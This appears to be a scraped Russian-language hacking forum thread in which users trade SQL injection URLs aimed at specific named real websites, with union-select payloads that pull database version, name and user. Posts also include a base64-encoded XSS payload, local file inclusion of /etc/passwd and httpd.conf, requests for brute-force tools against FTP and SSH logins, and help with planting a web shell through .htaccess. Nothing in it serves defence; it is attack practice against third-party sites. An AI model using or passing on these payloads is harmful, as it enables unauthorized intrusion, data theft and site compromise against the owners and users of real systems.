http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),6,7,8,9/*
2TehRn собственно ф чем проблема то ? "PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" Это не что иное как закодированный base64 "<script>alert('XSS')</script>" собтвенно кодируй то что нужно в base и вставляй это пассивная xss на форуме оч многа написанно по этой теме читай
подцепил локальным инклудом файлы /etc/passwd etc/httpd/conf/httpd.conf нашёл файл phpinfo.php из httpd.conf видно, что на хостинге есть ещё сайты. такая запись: но приинклудить из них ничего не получается. видимо, такие настройки. логов не нашёл =/ Загружать никаких файлов туда нельзя. что мне можно сделать, чтобы хакнуть этот сайт? По поводу /etc/passwd, знаю что брутят по маске Логин:Логин фтп, ссх. Скажите пожалуйста, какими брутфорсами это можно провернуть, кроме Гидры, не дружу с ней.
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),database(),password(0),user()))),6, 7,8,9/* кто знает как тут нарыть удалённый адрес для БД + можно там файлы посмотреть через иньекцию
Не знал куда написать. Решил сюда. Проблема с заливкой шелла. Шелл на holm.ru, но там есть пхп, поэтому он исполняется, а некопируется... Пробовал в .htaccess прописать AddType application/force-open .php - не помогло, как видите... на холме открывается загрузка файла, на сайте с инклюдом - каракули... Подскажите что путевое в htaccess прописать чтоб пахало
help: http://www.world-art.ru/games/games.php?id=4575+or+1=1 есть иньекция ? http://www.litprom.ru/text.phtml?storycode=1'
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359' http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359 http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359+order+by+5-- http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359+union+select+1,2,3,4,5-- инъекция есть, но с раскруткой проблемы. подскажет кто?
http://www.world-art.ru/games/games.php?id=4575+or+1=1 инъекции НЕТ! есть: http://www.litprom.ru/text.phtml?storycode=1' но слепая: http://www.litprom.ru/text.phtml?storycode=20+union+select+1 логическая ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in проходит фильтрацию. если число больше или меньше допустимого - выводится страница с ошибкой. Если нормальное (именно первое число, без остального запроса), то отправляется к БД, но уже с остальным запросом
я дето слышал что через иньекцию мона посмотреть какие папки на сервере мона такое очуществить и как?